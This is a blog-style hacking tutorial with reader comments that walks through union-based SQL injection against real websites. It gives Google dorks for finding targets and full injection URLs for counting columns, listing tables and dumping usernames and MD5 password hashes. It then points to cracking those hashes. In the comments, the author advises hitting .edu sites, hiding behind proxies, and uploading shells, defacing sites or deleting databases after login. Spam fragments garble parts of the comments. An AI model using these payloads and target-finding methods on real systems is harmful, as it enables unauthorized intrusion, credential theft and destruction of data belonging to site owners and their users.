Uptill now,we have seen few terms related to hacking and some methods to hack passwords like phishing,keyloggers etc. Now we are moving a little forward.Now in this thread i m going to post something about SQL INJECTION. Its a type of hacking with the help of which we can hack sites (mostly the newly born sites and educational sites )Ok buddiez lets start and kindly pay attention, let your mind think and its just a child play
1). Search for a vulnerable site.
Highlight one then press ctrl+c then ctrl+v at google search engine.- allinurl:index.php?id=
- allinurl:trainers.php?id=
- allinurl:buy.php?category=
- allinurl:article.php?ID=
- allinurl:play_old.php?id=
- allinurl:newsitem.php?num=
- allinurl:readnews.php?id=
- allinurl:top10.php?cat=
- allinurl:historialeer.php?num=
- allinurl:reagir.php?num=
- allinurl:Stray-Questions-View.php?num=
- allinurl:forum_bds.php?num=
- allinurl:game.php?id=
- allinurl:view_product.php?id=
- allinurl:newsone.php?id=
- allinurl:sw_comment.php?id=
- allinurl:news.php?id=
- allinurl:avd_start.php?avd=
- allinurl:event.php?id=
- allinurl:product-item.php?id=
- allinurl:sql.php?id=
- allinurl:news_view.php?id=
- allinurl:select_biblio.php?id=
- allinurl:humor.php?id=
- allinurl:aboutbook.php?id=
- allinurl:ogl_inet.php?ogl_id=
- allinurl:fiche_spectacle.php?id=
- allinurl:communique_detail.php?id=
- allinurl:sem.php3?id=
- allinurl:kategorie.php4?id=
- allinurl:news.php?id=
- allinurl:index.php?id=
- allinurl:faq2.php?id=
- allinurl:show_an.php?id=
- allinurl:preview.php?id=
- allinurl:loadpsb.php?id=
- allinurl:opinions.php?id=
- allinurl:spr.php?id=
- allinurl:pages.php?id=
- allinurl:announce.php?id=
- allinurl:clanek.php4?id=
- allinurl:participant.php?id=
- allinurl:download.php?id=
- allinurl:main.php?id=
- allinurl:review.php?id=
- allinurl:chappies.php?id=
- allinurl:read.php?id=
- allinurl:prod_detail.php?id=
- allinurl:viewphoto.php?id=
- allinurl:article.php?id=
- allinurl:person.php?id=
- allinurl:productinfo.php?id=
- allinurl:showimg.php?id=
- allinurl:view.php?id=
- allinurl:website.php?id=
- allinurl:hosting_info.php?id=
- allinurl:gallery.php?id=
- allinurl:rub.php?idr=
- allinurl:view_faq.php?id=
- allinurl:artikelinfo.php?id=
- allinurl:detail.php?ID=
- allinurl:index.php?=
- And this one is `just priceless… “login: *” “password= *” filetype:xls
2)Definitions:
inurl: -> is a search parameter in google so that it searches for results in the site's url.
.php?5= -> is what i'm searching for in a url, SQL INJECTION works by adding a code after the = symbol. This is also commonly referred as a Dork.
Dork definition: It's the part in the site's url that tells you that it can be vulnerable to a certain SQL injection. Let's take this exploit for example:
We will check it's vulnerability by adding magic qoute (') at the end of the url.
http://site.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--
3) So the url will be like this:
http://www.site.com/news_archive.php?id=5'
And we hit enter and we got this result.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6\';
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
Database error: next_record called with no query pending.
mySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1)
If you got an error, some text missing or a blank page the site is vulnerable but not at all.
Now we know that the site is vulnerable.
4) Find the columns :
The next step is find out how many columns the database containTo find it we use "order by" (without the qoute) and this string " -- " (no qoute).
It will look like this:
http://www.site.com/news_archive.php?id=6 order by 1-- (no error)
http://www.site.com/news_archive.php?id=6 order by 2-- (no error)
http://www.site.com/news_archive.php?id=6 order by 3-- (no error)
we move a little higher. (it doesn't matter)
http://www.site.com/news_archive.php?id=6 order by 10-- (no error)
http://www.site.com/news_archive.php?id=6 order by 14-- (no error)
until we got an error:
http://www.site.com/news_archive.php?id=6 order by 15-- (we got an error)
now we got an error on this column:it will lok like this.
Database error: Invalid SQL: SELECT * FROM NewsArticle WHERE NewsID=6 order by 15--;
mySQL Error: 1054 (Unknown column '15' in 'order clause')
Database error: next_record called with no query pending.
mySQL Error: 1054 (Unknown column '15' in 'order clause')
this mean the database contain only 14 columns
5)Union select :
Now use "-" (negative quote) and union select statement.using this we can select more data in one sql statement.
Look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14--
we hit enter.
numbers appears..
Like this:
6
, 5
8
6) Check MYSQL Version
Now we will check it's MYSQL VERSION. We will add @@version on the numbers appear on the previous step.lemme say i choose 8.. we will replace 8 with @@version,so it will look like this.
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, @@version, 9, 10, 11, 12, 13, 14--
and you will get a result like this:
6
, 5
5.1.32 <--this is the version
7) Getting Table Name.
We use group_concat(table_name).replace @@version with group_concat(table_name)
and look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14--
were not done already: (don't hit enter)
between number 14 and this "--" (quote) insert this:
+from+information_schema.tables+whe
re+table_schema=database()--
it will look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(table_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
we hit enter and got this result:
Blurb,FileUpload,Inquiries,NewsArticle,ProjectPhoto,active_sessions_split,auth_u ser_md5
8) Column Name :
Now we're done on TABLE NAME, we move on to COLUMN NAME.
use this string group_concat(column_name)
replace group_concat(table_name) to group_concat(column_name).
but before that we must choose one column. i choose auth_user_md5 because this is must or what we want.
for better result we need to hex auth_user_md5.
Go to this Link: http://home2.paulschou.net/tools/xlate/
p
aste auth_user_md5 to the text box and click encode.
now we get the hex of auth_user_md5: look like this: 61 75 74 68 5f 75 73 65 72 5f 6d 64 35
before proceeding remove space between each numbers. like this: 617574685f757365725f6d6435
Now replace group_concat(table_name) to group_concat(column_name).
like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.tables+where+table_schema=database()--
replace also +from+information_schema.tables+where+table_schema=database()--
to
+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
(The yellow letter and numbers is the auth_user_md5 hex we encoded)
Note: always add 0x before the hex. Like above.
Here is the result:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7, group_concat(column_name), 9, 10, 11, 12, 13, 14+from+information_schema.columns+where+table_name=0x617574685f757365725f6d6435--
Now hit enter: and you got result like this.
UserID,Username,Password,Perms,FirstName,MiddleName,LastName,Position,EmailAddre ss,ContactNumbers,DateCreated,CreatedBy,DateModified,ModifiedBy,Status
9) Main part :
We use 0x3a to obtain what we want from the DATABASE like pass, username, etc..etc..Replace group_concat(column_name) to group_concat(UserID,0x3a,Username,0x3a,P
assword,0x3a,Perms,0x3a,FirstName,0x3a,M iddleName,0x3a,LastName,0x3a,Position,0x3a,EmailAddress,0x3a,ContactNumbers,0x3a ,DateCreated,0x3a,CreatedBy,0x3a,DateModified,0x3a,ModifiedBy,0x3aStatus)
but i prefer to do this one group_concat(Username,0x3a,Password) for less effort.
and replace also information_schema.columns+where+table_name=0x617574685f757365725f6d6435-- to +from+auth_user_md5--
617574685f757365725f6d6435 is the hex value of auth_user_md5 so we replace it.
Result look like this:
http://www.site.com/news_archive.php?id=-6 union select 1, 2, 3, 4, 5, 6, 7,group_concat(Username,0x3a,Password), 9, 10, 11, 12, 13, 14+from+auth_user_md5--
i hit enter we got this:
admin username: k2admin / admin
password in md5 hash:21232f297a57a5a743894a0e4a801fc3 / 97fda9951fd2d6c75ed53484cdc6ee2d
10)Cracking the password :
Because the password is in md5 hash we need to crack it.http://passcracking.com/index.php
pass
: x1R0zYB3bex
Here Check some Commands Useful for SQL Injection and also check some Online Sites Helpful for SQL Injection and the most of all must check this Video Tutorial about How to hack Website Using SQL Injection .
About the Author
I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
| Follow @xeohacker |
 In 61 people's circles
|
 |
 |
 |
 |
Subscribe To Get FREE Tutorials!
|
Respected Readers:
|
29 comments:
bro also post for asp and aspx
hmmm will try to post a chapter on it too
where can i find a real hacker to communicate
In social networking sites or
where......................................
There are lots of great hackers on facebook ..... u can talk to them or if u wanna talk to me then add me on facebook ..... :))
But the real thing is no one will teach u , if u really want to learn hacking then read tutorials .... net is the best teacher
i dont get the column number where i wrong
i got trap in 5 part.
@Anonymous you have to try hard to get the column number like try each number from 1 to untill you get the column number ..... it may be on 10 or may be 100
and I will suggest that before doing column search first make it confirm that the site is vulnerable bcoz if its not then u can find the column no and its better to try sql on some .edu site bcoz they are mostly vulnerable to sql ....
@Anonymouswhat msg coming when u do the step 5 ??
How hackers earn money $$$...............
thanx xeo, this thing is really simple and easy to nderstand, u really explained well, took me not more than 30mins to practice it.
Sheharyar Good to know that u got this tutorial .... I always tried my best to make tutorial as simple as possible .... one more thing take much care while doing this attack as its really toxic and may cause u severe loss .... :))
well i just learnt getting d login n passwords, that too not to threaten anyone just for learning, n btw wat kind of losses can it cause me?
also explain wat all can we do after getting d login n password? how much authority we get with that login n password?
can u mention some sites that are vulenrable to sql injection
@Sheharyar whenever you try to hack some website make sure that u r undetectable i.e use proxy , also change your mac address , these things are really necessary as if you get caught you will be severely punished as hacking is a crime ....
after getting login and password u may upload shell in it or can deface it .... delete its database can do anything to it ....
use google dorks and then add ' to find is it vulnerable or not u will easily find such sites
Thnx, i will work futher on it asap.
i want 2 work on it , but what 2 do 1st thing i dont understand following words & the long list in first point......
"1). Search for a vulnerable site.
Highlight one then press ctrl+c then ctrl+v at google search engine."
what is list for & i have not seen such .php?id= in common
sites....
also tel me how to Search for a vulnerable sites in details... plz
@ john copy one dork from the given dorks in first step and paste them in google search engine and hit enter and then you will get a lots of vulnerable sites .... not open any one and check whether its vulnerable or not
Thanks for sharing superb gclub informations. Your site is so cool.
Thanks for the sbo information, I really enjoyed the post.
ords like phishisbo
sbo
ng,keyloggers etc. Now we are moving a little
hi XEO i have some question about websites for you:
i know a website with 2 culmns only.how can i applique @@version and the other things ?
2- i know a porn website that i wanna hack, i added ' and it gaves me error but when i tried to know how many columns is has , i found that it has illimited columns ? what to do in this case ?
3- how can i find the admin page to connect with admin name and password ??...plz answer me
website with 2 culmns only.how can i applique @@version and the other things ?
2- i know a porn wsbo
sbo
ebsite that i wanna
to post somesbo
sbo
thing about
sbo
sbo
Great and
Brilliant.
no I got the password, how do I "log in" to the page?
this sounds kinda nooby, but please, help me!
to replysbo
sbo
to your
Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Post a CommentNote:-
Please do not spam Spam comments will be deleted immediately upon my review.
Regards,
XEO Hacker